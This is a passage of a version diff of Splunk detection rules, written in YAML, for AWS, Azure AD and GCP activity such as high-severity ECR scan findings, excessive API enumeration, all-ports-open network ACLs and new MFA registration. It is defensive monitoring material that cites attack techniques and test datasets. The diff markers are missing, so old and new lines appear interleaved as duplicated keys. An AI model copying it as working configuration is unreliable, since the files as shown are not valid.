description: This search looks for AWS CloudTrail events from AWS Elastic Container Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings
with the results.
data_source:
description: The following analytic identifies high-severity findings from AWS Elastic
Container Registry (ECR) image scans. It detects these activities by analyzing AWS
CloudTrail logs for the DescribeImageScanFindings event, specifically filtering
for findings with a high severity level. This activity is significant for a SOC
because high-severity vulnerabilities in container images can lead to potential
exploitation if not addressed. If confirmed malicious, attackers could exploit these
vulnerabilities to gain unauthorized access, execute arbitrary code, or escalate
privileges within the container environment, posing a significant risk to the overall
security posture.
data_source:
- AWS CloudTrail DescribeImageScanFindings
search: >-
`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings | search severity=HIGH | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_high_filter`
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs.
`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings |
spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand
findings | spath input=findings | search severity=HIGH | rename name as finding_name,
description as finding_description, requestParameters.imageId.imageDigest as imageDigest,
requestParameters.repositoryName as repository, userIdentity.principalId as user
| eval finding = finding_name.", ".finding_description | eval phase="release" |
eval severity="high" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion,
eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_high_filter`
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
search works with AWS CloudTrail logs.
known_false_positives: unknown
references:
- https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html
@@ -31,7 +47,7 @@ tags:
role:
- Attacker
- name: repository
type: Other
type: Other
role:
- Victim
product:
@@ -53,6 +69,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
@@ -1,16 +1,30 @@
name: AWS ECR Container Scanning Findings Low Informational Unknown
id: cbc95e44-7c22-443f-88fd-0424478f5589
version: 2
date: '2023-11-09'
version: 3
date: '2024-05-15'
author: Patrick Bareiss, Eric McGinnis Splunk
status: production
type: Anomaly
description: This search looks for AWS CloudTrail events from AWS Elastic Container
Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings
with the results.
data_source:
description: The following analytic identifies low, informational, or unknown severity
findings from AWS Elastic Container Registry (ECR) image scans. It leverages AWS
CloudTrail logs, specifically the DescribeImageScanFindings event, to detect these
findings. This activity is significant for a SOC as it helps in early identification
of potential vulnerabilities or misconfigurations in container images, which could
be exploited if left unaddressed. If confirmed malicious, these findings could lead
to unauthorized access, data breaches, or further exploitation within the containerized
environment.
data_source:
- AWS CloudTrail DescribeImageScanFindings
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings| search severity IN ("LOW", "INFORMATIONAL", "UNKNOWN") | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user | eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="low" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_low_informational_unknown_filter`'
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings
| spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand
findings | spath input=findings| search severity IN ("LOW", "INFORMATIONAL", "UNKNOWN")
| rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest
as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId
as user | eval finding = finding_name.", ".finding_description | eval phase="release"
| eval severity="low" | stats min(_time) as firstTime max(_time) as lastTime by
awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding,
phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
| `aws_ecr_container_scanning_findings_low_informational_unknown_filter`'
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
search works with AWS CloudTrail logs.
known_false_positives: unknown
@@ -32,7 +46,7 @@ tags:
role:
- Attacker
- name: repository
type: Other
type: Other
role:
- Victim
product:
@@ -54,6 +68,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
@@ -1,17 +1,31 @@
name: AWS ECR Container Scanning Findings Medium
id: 0b80e2c8-c746-4ddb-89eb-9efd892220cf
version: 2
date: '2023-11-09'
version: 3
date: '2024-05-06'
author: Patrick Bareiss, Splunk
status: production
type: Anomaly
description: This search looks for AWS CloudTrail events from AWS Elastic Container
Service (ECR). You need to activate image scanning in order to get the event DescribeImageScanFindings
with the results.
data_source:
description: The following analytic identifies medium-severity findings from AWS Elastic
Container Registry (ECR) image scans. It leverages AWS CloudTrail logs, specifically
the DescribeImageScanFindings event, to detect vulnerabilities in container images.
This activity is significant for a SOC as it highlights potential security risks
in containerized applications, which could be exploited if not addressed. If confirmed
malicious, these vulnerabilities could lead to unauthorized access, data breaches,
or further exploitation within the container environment, compromising the overall
security posture.
data_source:
- AWS CloudTrail DescribeImageScanFindings
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings | spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand findings | spath input=findings| search severity=MEDIUM | rename name as finding_name, description as finding_description, requestParameters.imageId.imageDigest as imageDigest, requestParameters.repositoryName as repository, userIdentity.principalId as user| eval finding = finding_name.", ".finding_description | eval phase="release" | eval severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion, eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_medium_filter`'
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs.
search: '`cloudtrail` eventSource=ecr.amazonaws.com eventName=DescribeImageScanFindings
| spath path=responseElements.imageScanFindings.findings{} output=findings | mvexpand
findings | spath input=findings| search severity=MEDIUM | rename name as finding_name,
description as finding_description, requestParameters.imageId.imageDigest as imageDigest,
requestParameters.repositoryName as repository, userIdentity.principalId as user|
eval finding = finding_name.", ".finding_description | eval phase="release" | eval
severity="medium" | stats min(_time) as firstTime max(_time) as lastTime by awsRegion,
eventName, eventSource, imageDigest, repository, user, src_ip, finding, phase, severity
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_ecr_container_scanning_findings_medium_filter`'
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
search works with AWS CloudTrail logs.
known_false_positives: unknown
references:
- https://docs.aws.amazon.com/AmazonECR/latest/userguide/image-scanning.html
@@ -31,7 +45,7 @@ tags:
role:
- Attacker
- name: repository
type: Other
type: Other
role:
- Victim
product:
@@ -53,6 +67,7 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.003/aws_ecr_image_scanning/aws_ecr_scanning_findings_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
@@ -1,19 +1,23 @@
name: AWS Excessive Security Scanning
id: 1fdd164a-def8-4762-83a9-9ffe24e74d5a
version: 1
date: '2021-04-13'
version: 2
date: '2024-05-08'
author: Patrick Bareiss, Splunk
status: production
type: TTP
description: This search looks for AWS CloudTrail events and analyse the amount of
eventNames which starts with Describe by a single user. This indicates that this
user scans the configuration of your AWS cloud environment.
data_source:
description: The following analytic identifies excessive security scanning activities
in AWS by detecting a high number of Describe, List, or Get API calls from a single
user. It leverages AWS CloudTrail logs to count distinct event names and flags users
with more than 50 such events. This behavior is significant as it may indicate reconnaissance
activities by an attacker attempting to map out your AWS environment. If confirmed
malicious, this could lead to unauthorized access, data exfiltration, or further
exploitation of your cloud infrastructure.
data_source:
- AWS CloudTrail
search: '`cloudtrail` eventName=Describe* OR eventName=List* OR eventName=Get* |
stats dc(eventName) as dc_events min(_time) as firstTime max(_time) as lastTime
values(eventName) as command values(src) as src values(userAgent) as userAgent
by user userIdentity.arn | where dc_events > 50 | `security_content_ctime(firstTime)`
values(eventName) as command values(src) as src values(userAgent) as userAgent by
user userIdentity.arn | where dc_events > 50 | `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`|`aws_excessive_security_scanning_filter`'
how_to_implement: You must install splunk AWS add on and Splunk App for AWS. This
search works with AWS CloudTrail logs.
@@ -26,7 +30,8 @@ tags:
asset_type: AWS Account
confidence: 60
impact: 30
message: User $user$ has excessive number of api calls $dc_events$ from these IP addresses $src$, violating the threshold of 50, using the following commands $command$.
message: User $user$ has excessive number of api calls $dc_events$ from these IP
addresses $src$, violating the threshold of 50, using the following commands $command$.
mitre_attack_id:
- T1526
observable:
@@ -54,7 +59,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/aws_security_scanner/aws_security_scanner.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/aws_security_scanner/aws_security_scanner.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,12 +1,19 @@
name: AWS Network Access Control List Created with All Open Ports
id: ada0f478-84a8-4641-a3f1-d82362d6bd75
version: 2
date: '2021-01-11'
version: 3
date: '2024-05-14'
author: Bhavin Patel, Patrick Bareiss, Splunk
status: production
type: TTP
description: The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR.
data_source:
description: The following analytic detects the creation of AWS Network Access Control
Lists (ACLs) with all ports open to a specified CIDR. It leverages AWS CloudTrail
events, specifically monitoring for `CreateNetworkAclEntry` or `ReplaceNetworkAclEntry`
actions with rules allowing all traffic. This activity is significant because it
can expose the network to unauthorized access, increasing the risk of data breaches
and other malicious activities. If confirmed malicious, an attacker could exploit
this misconfiguration to gain unrestricted access to the network, potentially leading
to data exfiltration, service disruption, or further compromise of the AWS environment.
data_source:
- AWS CloudTrail CreateNetworkAclEntry
- AWS CloudTrail ReplaceNetworkAclEntry
search: '`cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry
@@ -32,7 +39,8 @@ tags:
asset_type: AWS Instance
confidence: 80
impact: 60
message: User $user_arn$ has created network ACLs with all the ports open to a specified CIDR $requestParameters.cidrBlock$
message: User $user_arn$ has created network ACLs with all the ports open to a specified
CIDR $requestParameters.cidrBlock$
mitre_attack_id:
- T1562.007
- T1562
@@ -66,7 +74,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1562.007/aws_create_acl/aws_cloudtrail_events.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1562.007/aws_create_acl/aws_cloudtrail_events.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,14 +1,18 @@
name: AWS New MFA Method Registered For User
id: 4e3c26f2-4fb9-4bd7-ab46-1b76ffa2a23b
version: 1
date: '2023-01-31'
version: 2
date: '2024-05-13'
author: Bhavin Patel, Splunk
status: production
type: TTP
description: The following analytic identifies the registration of a new Multi Factor
authentication method for an AWS account. Adversaries who have obtained unauthorized
access to an AWS account may register a new MFA method to maintain persistence.
data_source:
description: The following analytic detects the registration of a new Multi-Factor
Authentication (MFA) method for an AWS account. It leverages AWS CloudTrail logs
to identify the `CreateVirtualMFADevice` event. This activity is significant because
adversaries who gain unauthorized access to an AWS account may register a new MFA
method to maintain persistence. If confirmed malicious, this could allow attackers
to secure their access, making it difficult to detect and remove their presence,
potentially leading to further unauthorized activities and data breaches.
data_source:
- AWS CloudTrail CreateVirtualMFADevice
search: ' `cloudtrail` eventName=CreateVirtualMFADevice | stats count values(requestParameters.virtualMFADeviceName)
as virtualMFADeviceName min(_time) as firstTime max(_time) as lastTime by eventSource
@@ -64,7 +68,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556.006/aws_new_mfa_method_registered_for_user/cloudtrail.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556.006/aws_new_mfa_method_registered_for_user/cloudtrail.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,6 +1,6 @@
name: Azure AD Privileged Role Assigned
id: a28f0bc3-3400-4a6e-a2da-89b9e95f0d2a
version: 2
version: 3
date: '2023-12-20'
author: Mauricio Velazco, Gowthamaraj Rajendran, Splunk
status: production
@@ -14,10 +14,10 @@ data_source:
search: ' `azure_monitor_aad` "operationName"="Add member to role" | rename properties.* as *
| rename initiatedBy.user.userPrincipalName as initiatedBy
| rename targetResources{}.modifiedProperties{}.newValue as roles
| eval role=mvindex(roles,1)
| eval role=mvindex(roles,1)
| stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName, role
| lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description
| search isprvilegedadrole = True
| stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName, role, description
| search isprvilegedadrole = True
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `azure_ad_privileged_role_assigned_filter`'
@@ -1,6 +1,6 @@
name: Azure AD Privileged Role Assigned to Service Principal
id: 5dfaa3d3-e2e4-4053-8252-16d9ee528c41
version: 2
version: 3
date: '2023-12-20'
author: Mauricio Velazco, Splunk
status: production
@@ -16,9 +16,9 @@ search: ' `azure_monitor_aad` operationName="Add member to role"
| eval role=mvindex(roles,1)
| rename targetResources{}.displayName as apps
| eval displayName=mvindex(apps,0)
| stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, role
| lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description
| search isprvilegedadrole = True
| stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, role
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `azure_ad_privileged_role_assigned_to_service_principal_filter`'
@@ -1,12 +1,17 @@
name: Cloud Compute Instance Created By Previously Unseen User
id: 37a0ec8d-827e-4d6d-8025-cedf31f3a149
version: 2
date: '2021-07-13'
version: 3
date: '2025-05-18'
author: Rico Valdez, Splunk
status: experimental
type: Anomaly
description: This search looks for cloud compute instances created by users who have
not created them before.
description: The following analytic identifies the creation of cloud compute instances
by users who have not previously created them. It leverages data from the Change
data model, focusing on 'create' actions by users, and cross-references with a baseline
of known user activities. This activity is significant as it may indicate unauthorized
access or misuse of cloud resources by new or compromised accounts. If confirmed
malicious, attackers could deploy unauthorized compute instances, leading to potential
data exfiltration, increased costs, or further exploitation within the cloud environment.
data_source: []
search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change
@@ -58,7 +63,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,13 +1,18 @@
name: Cloud Compute Instance Created In Previously Unused Region
id: fa4089e2-50e3-40f7-8469-d2cc1564ca59
version: 1
date: '2020-09-02'
version: 2
date: '2024-05-10'
author: David Dorsey, Splunk
status: experimental
type: Anomaly
description: This search looks at cloud-infrastructure events where an instance is
created in any region within the last hour and then compares it to a lookup file
of previously seen regions where instances have been created.
description: The following analytic detects the creation of a cloud compute instance
in a region that has not been previously used within the last hour. It leverages
cloud infrastructure logs and compares the regions of newly created instances against
a lookup file of historically used regions. This activity is significant because
the creation of instances in new regions can indicate unauthorized or suspicious
activity, such as an attacker attempting to evade detection or establish a foothold
in a less monitored area. If confirmed malicious, this could lead to unauthorized
resource usage, data exfiltration, or further compromise of the cloud environment.
data_source: []
search: '| tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id)
as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region,
@@ -61,7 +66,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,12 +1,17 @@
name: Cloud Instance Modified By Previously Unseen User
id: 7fb15084-b14e-405a-bd61-a6de15a40722
version: 1
date: '2020-07-29'
version: 2
date: '2024-05-17'
author: Rico Valdez, Splunk
status: experimental
type: Anomaly
description: This search looks for cloud instances being modified by users who have
not previously modified them.
description: The following analytic identifies cloud instances being modified by users
who have not previously modified them. It leverages data from the Change data model,
focusing on successful modifications of EC2 instances. This activity is significant
because it can indicate unauthorized or suspicious changes by potentially compromised
or malicious users. If confirmed malicious, this could lead to unauthorized access,
configuration changes, or potential disruption of cloud services, posing a significant
risk to the organization's cloud infrastructure.
data_source: []
search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command)
@@ -57,7 +62,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,14 +1,18 @@
name: Cloud Provisioning Activity From Previously Unseen City
id: e7ecc5e0-88df-48b9-91af-51104c68f02f
version: 1
date: '2020-10-09'
version: 2
date: '2024-05-16'
author: Rico Valdez, Bhavin Patel, Splunk
status: production
type: Anomaly
description: This search looks for cloud provisioning activities from previously unseen
cities. Provisioning activities are defined broadly as any event that runs or creates
something.
data_source:
description: The following analytic detects cloud provisioning activities originating
from previously unseen cities. It leverages cloud infrastructure logs and compares
the geographic location of the source IP address against a baseline of known locations.
This activity is significant as it may indicate unauthorized access or misuse of
cloud resources from an unexpected location. If confirmed malicious, this could
lead to unauthorized resource creation, potential data exfiltration, or further
compromise of cloud infrastructure.
data_source:
- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success
@@ -31,15 +35,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
macro.
known_false_positives: 'This is a strictly behavioral search, so we define "false
positive" slightly differently. Every time this fires, it will accurately reflect
the first occurrence in the time period you''re searching within, plus what is
stored in the cache feature. But while there are really no "false positives"
in a traditional sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
of provisioning activity. If you typically do all provisioning from tools inside
of your country, there should be few false positives. If you are located in countries
where the free version of **MaxMind GeoIP** that ships by default with Splunk
has weak resolution (particularly small countries in less economically powerful
the first occurrence in the time period you''re searching within, plus what is stored
in the cache feature. But while there are really no "false positives" in a traditional
sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database
for any kind of provisioning activity. If you typically do all provisioning from
tools inside of your country, there should be few false positives. If you are located
in countries where the free version of **MaxMind GeoIP** that ships by default with
Splunk has weak resolution (particularly small countries in less economically powerful
regions), this may be much less valuable to you.'
references: []
tags:
@@ -48,8 +52,8 @@ tags:
asset_type: AWS Instance
confidence: 60
impact: 30
message: User $user$ is starting or creating an instance $object$ for the first time
in City $City$ from IP address $src$
message: User $user$ is starting or creating an instance $object$ for the first
time in City $City$ from IP address $src$
mitre_attack_id:
- T1078
observable:
@@ -83,7 +87,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,14 +1,18 @@
name: Cloud Provisioning Activity From Previously Unseen Country
id: 94994255-3acf-4213-9b3f-0494df03bb31
version: 1
date: '2020-10-09'
version: 2
date: '2024-05-22'
author: Rico Valdez, Bhavin Patel, Splunk
status: production
type: Anomaly
description: This search looks for cloud provisioning activities from previously unseen
countries. Provisioning activities are defined broadly as any event that runs or
creates something.
data_source:
description: The following analytic detects cloud provisioning activities originating
from previously unseen countries. It leverages cloud infrastructure logs and compares
the geographic location of the source IP address against a baseline of known locations.
This activity is significant as it may indicate unauthorized access or potential
compromise of cloud resources. If confirmed malicious, an attacker could gain control
over cloud assets, leading to data breaches, service disruptions, or further infiltration
into the network.
data_source:
- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success
@@ -31,15 +35,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
macro.
known_false_positives: 'This is a strictly behavioral search, so we define "false
positive" slightly differently. Every time this fires, it will accurately reflect
the first occurrence in the time period you''re searching within, plus what is
stored in the cache feature. But while there are really no "false positives"
in a traditional sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
of provisioning activity. If you typically do all provisioning from tools inside
of your country, there should be few false positives. If you are located in countries
where the free version of **MaxMind GeoIP** that ships by default with Splunk
has weak resolution (particularly small countries in less economically powerful
the first occurrence in the time period you''re searching within, plus what is stored
in the cache feature. But while there are really no "false positives" in a traditional
sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database
for any kind of provisioning activity. If you typically do all provisioning from
tools inside of your country, there should be few false positives. If you are located
in countries where the free version of **MaxMind GeoIP** that ships by default with
Splunk has weak resolution (particularly small countries in less economically powerful
regions), this may be much less valuable to you.'
references: []
tags:
@@ -83,7 +87,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,14 +1,18 @@
name: Cloud Provisioning Activity From Previously Unseen IP Address
id: f86a8ec9-b042-45eb-92f4-e9ed1d781078
version: 1
date: '2020-08-16'
version: 2
date: '2024-05-16'
author: Rico Valdez, Splunk
status: production
type: Anomaly
description: This search looks for cloud provisioning activities from previously unseen
IP addresses. Provisioning activities are defined broadly as any event that runs
or creates something.
data_source:
description: The following analytic detects cloud provisioning activities originating
from previously unseen IP addresses. It leverages cloud infrastructure logs to identify
events where resources are created or started, and cross-references these with a
baseline of known IP addresses. This activity is significant as it may indicate
unauthorized access or potential misuse of cloud resources. If confirmed malicious,
an attacker could gain unauthorized control over cloud resources, leading to data
breaches, service disruptions, or increased operational costs.
data_source:
- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime, values(All_Changes.object_id)
as object_id from datamodel=Change where (All_Changes.action=started OR All_Changes.action=created)
@@ -30,15 +34,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
macro.
known_false_positives: 'This is a strictly behavioral search, so we define "false
positive" slightly differently. Every time this fires, it will accurately reflect
the first occurrence in the time period you''re searching within, plus what is
stored in the cache feature. But while there are really no "false positives"
in a traditional sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
of provisioning activity. If you typically do all provisioning from tools inside
of your country, there should be few false positives. If you are located in countries
where the free version of **MaxMind GeoIP** that ships by default with Splunk
has weak resolution (particularly small countries in less economically powerful
the first occurrence in the time period you''re searching within, plus what is stored
in the cache feature. But while there are really no "false positives" in a traditional
sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database
for any kind of provisioning activity. If you typically do all provisioning from
tools inside of your country, there should be few false positives. If you are located
in countries where the free version of **MaxMind GeoIP** that ships by default with
Splunk has weak resolution (particularly small countries in less economically powerful
regions), this may be much less valuable to you.'
references: []
tags:
@@ -82,7 +86,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,14 +1,18 @@
name: Cloud Provisioning Activity From Previously Unseen Region
id: 5aba1860-9617-4af9-b19d-aecac16fe4f2
version: 1
date: '2020-08-16'
version: 2
date: '2024-05-17'
author: Rico Valdez, Bhavin Patel, Splunk
status: production
type: Anomaly
description: This search looks for cloud provisioning activities from previously unseen
regions. Provisioning activities are defined broadly as any event that runs or creates
something.
data_source:
description: The following analytic detects cloud provisioning activities originating
from previously unseen regions. It leverages cloud infrastructure logs to identify
events where resources are started or created, and cross-references these with a
baseline of known regions. This activity is significant as it may indicate unauthorized
access or misuse of cloud resources from unfamiliar locations. If confirmed malicious,
this could lead to unauthorized resource creation, potential data exfiltration,
or further compromise of cloud infrastructure.
data_source:
- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change
where (All_Changes.action=started OR All_Changes.action=created) All_Changes.status=success
@@ -31,15 +35,15 @@ how_to_implement: You must be ingesting your cloud infrastructure logs from your
macro.
known_false_positives: 'This is a strictly behavioral search, so we define "false
positive" slightly differently. Every time this fires, it will accurately reflect
the first occurrence in the time period you''re searching within, plus what is
stored in the cache feature. But while there are really no "false positives"
in a traditional sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database for any kind
of provisioning activity. If you typically do all provisioning from tools inside
of your country, there should be few false positives. If you are located in countries
where the free version of **MaxMind GeoIP** that ships by default with Splunk
has weak resolution (particularly small countries in less economically powerful
the first occurrence in the time period you''re searching within, plus what is stored
in the cache feature. But while there are really no "false positives" in a traditional
sense, there is definitely lots of noise.
This search will fire any time a new IP address is seen in the **GeoIP** database
for any kind of provisioning activity. If you typically do all provisioning from
tools inside of your country, there should be few false positives. If you are located
in countries where the free version of **MaxMind GeoIP** that ships by default with
Splunk has weak resolution (particularly small countries in less economically powerful
regions), this may be much less valuable to you.'
references: []
tags:
@@ -83,7 +87,8 @@ tags:
tests:
- name: True Positive Test
attack_data:
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
- data:
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/abnormally_high_cloud_instances_launched/cloudtrail_behavioural_detections.json
sourcetype: aws:cloudtrail
source: aws_cloudtrail
update_timestamp: true
@@ -1,13 +1,17 @@
name: Detect GCP Storage access from a new IP
id: ccc3246a-daa1-11ea-87d0-0242ac130022
version: 1
date: '2020-08-10'
version: 2
date: '2024-05-14'
author: Shannon Davis, Splunk
status: experimental
type: Anomaly
description: This search looks at GCP Storage bucket-access logs and detects new or
previously unseen remote IP addresses that have successfully accessed a GCP Storage
bucket.
description: The following analytic identifies access to GCP Storage buckets from
new or previously unseen remote IP addresses. It leverages GCP Storage bucket-access
logs ingested via Cloud Pub/Sub and compares current access events against a lookup
table of previously seen IP addresses. This activity is significant as it may indicate
unauthorized access or potential reconnaissance by an attacker. If confirmed malicious,
